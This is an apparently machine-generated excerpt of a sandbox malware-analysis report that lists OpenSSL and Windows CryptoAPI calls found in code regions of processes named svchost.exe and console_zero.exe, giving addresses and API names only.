Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE579D0 CRYPTO_malloc,memcpy,BIO_snprintf,BIO_snprintf,CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_new_file,BIO_free_all,CRYPTO_free,BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE579D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE47B50 EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,ERR_new,ERR_set_debug,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug, 46_2_00007FFA2CE47B50
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE99B4A memset,CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 46_2_00007FFA2CE99B4A
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE99B33 EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestVerify,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free, 46_2_00007FFA2CE99B33
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6BB00 CRYPTO_free, 46_2_00007FFA2CE6BB00
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE5FCB0 CRYPTO_free, 46_2_00007FFA2CE5FCB0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE99CAA ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free, 46_2_00007FFA2CE99CAA
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8FC90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug, 46_2_00007FFA2CE8FC90
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE91C70 CRYPTO_realloc, 46_2_00007FFA2CE91C70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE29C50 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free, 46_2_00007FFA2CE29C50
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE21C50 CRYPTO_zalloc, 46_2_00007FFA2CE21C50
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE23C40 ERR_clear_error,ERR_new,ERR_set_debug,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,SetLastError,BIO_read,BIO_ADDR_new,BIO_ctrl,BIO_ctrl,BIO_ADDR_free,BIO_write,BIO_ctrl,BIO_test_flags,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_ctrl,BIO_ADDR_clear,BIO_write,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_test_flags,BIO_ADDR_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error, 46_2_00007FFA2CE23C40
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA9C40 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CEA9C40
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE73C30 CRYPTO_zalloc,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE73C30
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3BC10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup, 46_2_00007FFA2CE3BC10
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE27BEE CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE27BEE
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE21BE0 CRYPTO_zalloc, 46_2_00007FFA2CE21BE0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE475B0 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free, 46_2_00007FFA2CE475B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE895A0 CRYPTO_free, 46_2_00007FFA2CE895A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE29590 CRYPTO_free,CRYPTO_memdup, 46_2_00007FFA2CE29590
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8B590 CRYPTO_free, 46_2_00007FFA2CE8B590
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE45550 CRYPTO_malloc,CRYPTO_new_ex_data,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,ERR_new,ERR_set_debug,ERR_set_error,X509_chain_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup, 46_2_00007FFA2CE45550
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEAB550 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CEAB550
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE89540 OPENSSL_cleanse,CRYPTO_free, 46_2_00007FFA2CE89540
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2B500 CRYPTO_free, 46_2_00007FFA2CE2B500
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE35500 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup, 46_2_00007FFA2CE35500
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE434E0 CRYPTO_THREAD_write_lock,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free, 46_2_00007FFA2CE434E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8D4E0 ERR_new,ERR_set_debug,CRYPTO_free, 46_2_00007FFA2CE8D4E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE974E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE974E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE916B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 46_2_00007FFA2CE916B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3D68B X509_VERIFY_PARAM_free,BIO_pop,BIO_free,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,OSSL_STACK_OF_X509_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,BIO_free_all,BIO_free_all,CRYPTO_free, 46_2_00007FFA2CE3D68B
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE43650 CRYPTO_THREAD_unlock, 46_2_00007FFA2CE43650
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA1650 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CEA1650
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE89620 CRYPTO_malloc,ERR_new,ERR_set_debug, 46_2_00007FFA2CE89620
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE5B5F0 CRYPTO_free, 46_2_00007FFA2CE5B5F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8D5F0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new, 46_2_00007FFA2CE8D5F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8B5E0 CRYPTO_free, 46_2_00007FFA2CE8B5E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE775D0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE775D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE215D0 CRYPTO_free, 46_2_00007FFA2CE215D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE235C8 CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags, 46_2_00007FFA2CE235C8
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE35780 a2i_IPADDRESS,ASN1_OCTET_STRING_free,X509_VERIFY_PARAM_get1_ip_asc,CRYPTO_free,X509_VERIFY_PARAM_add1_host, 46_2_00007FFA2CE35780
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE95760 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE95760
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE21740 CRYPTO_zalloc,CRYPTO_free, 46_2_00007FFA2CE21740
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE89730 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_free, 46_2_00007FFA2CE89730
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE33700 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE33700
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE9B6E0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,RAND_bytes_ex,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_CTX_ctrl,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug, 46_2_00007FFA2CE9B6E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE736D0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE736D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE876D0 CRYPTO_free, 46_2_00007FFA2CE876D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE556D0 CRYPTO_zalloc, 46_2_00007FFA2CE556D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE236C0 X509_VERIFY_PARAM_get0_peername,BIO_get_shutdown,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free, 46_2_00007FFA2CE236C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE27870 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free, 46_2_00007FFA2CE27870
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8B870 CRYPTO_free, 46_2_00007FFA2CE8B870
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE9985F memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,memcmp,memcmp,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free, 46_2_00007FFA2CE9985F
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE29850 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_decapsulate,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free, 46_2_00007FFA2CE29850
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE35840 i2d_PUBKEY,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,d2i_PUBKEY,EVP_PKEY_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free, 46_2_00007FFA2CE35840
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE43840 OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE43840
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE33820 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,CRYPTO_realloc, 46_2_00007FFA2CE33820
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE75190 BIO_free,CRYPTO_free, 46_2_00007FFA2CE75190
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4D140 CRYPTO_free,CRYPTO_malloc, 46_2_00007FFA2CE4D140
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE9B140 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_size,ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free, 46_2_00007FFA2CE9B140
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE39120 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock, 46_2_00007FFA2CE39120
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE71127 CRYPTO_realloc, 46_2_00007FFA2CE71127
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE5D100 CRYPTO_free, 46_2_00007FFA2CE5D100
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7F0F0 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy, 46_2_00007FFA2CE7F0F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE910E0 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE910E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE550D0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free, 46_2_00007FFA2CE550D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA92A0 EVP_MD_get_size,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CEA92A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6F290 CRYPTO_realloc, 46_2_00007FFA2CE6F290
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE25240 CRYPTO_zalloc,CRYPTO_free, 46_2_00007FFA2CE25240
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2321D X509_VERIFY_PARAM_get0_peername,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,X509_VERIFY_PARAM_get0_peername,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init, 46_2_00007FFA2CE2321D
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE63220 CRYPTO_zalloc,CRYPTO_free, 46_2_00007FFA2CE63220
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE41210 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free, 46_2_00007FFA2CE41210
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE73200 OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_delete,CRYPTO_free, 46_2_00007FFA2CE73200
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE551E0 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free, 46_2_00007FFA2CE551E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE751D0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,ERR_new,ERR_set_debug,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_MD_up_ref,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_free,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,CRYPTO_free, 46_2_00007FFA2CE751D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE213A0 CRYPTO_free, 46_2_00007FFA2CE213A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE993A0 ERR_new,ERR_set_debug,CRYPTO_clear_free, 46_2_00007FFA2CE993A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE73380 CRYPTO_free, 46_2_00007FFA2CE73380
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE9B370 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,RAND_bytes_ex,EVP_MD_CTX_new,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free, 46_2_00007FFA2CE9B370
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2D360 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free, 46_2_00007FFA2CE2D360
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE37360 CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free, 46_2_00007FFA2CE37360
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA5360 ERR_new,i2d_PUBKEY,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free, 46_2_00007FFA2CEA5360
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4D310 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE4D310
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE492F0 CRYPTO_realloc,memcpy, 46_2_00007FFA2CE492F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE5B2D0 CRYPTO_free, 46_2_00007FFA2CE5B2D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE432C0 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock, 46_2_00007FFA2CE432C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE5B4B0 CRYPTO_zalloc, 46_2_00007FFA2CE5B4B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8B4A0 CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE8B4A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4D440 CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,CONF_parse_list,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE4D440
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE91430 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug, 46_2_00007FFA2CE91430
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8B420 CRYPTO_free, 46_2_00007FFA2CE8B420
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3310E3C0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 51_2_00007FFA3310E3C0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3311C300 BCryptGenRandom, 51_2_00007FFA3311C300
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3313E270 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 51_2_00007FFA3313E270
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33123110 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 51_2_00007FFA33123110
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA331231A0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 51_2_00007FFA331231A0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA330F1180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 51_2_00007FFA330F1180
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3313E7A0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx, 51_2_00007FFA3313E7A0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3313B4E0 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 51_2_00007FFA3313B4E0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3310E4F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext, 51_2_00007FFA3310E4F0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3311C4D0 memset,BCryptGenRandom, 51_2_00007FFA3311C4D0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3310E570 CryptHashData, 51_2_00007FFA3310E570
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3310E580 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 51_2_00007FFA3310E580
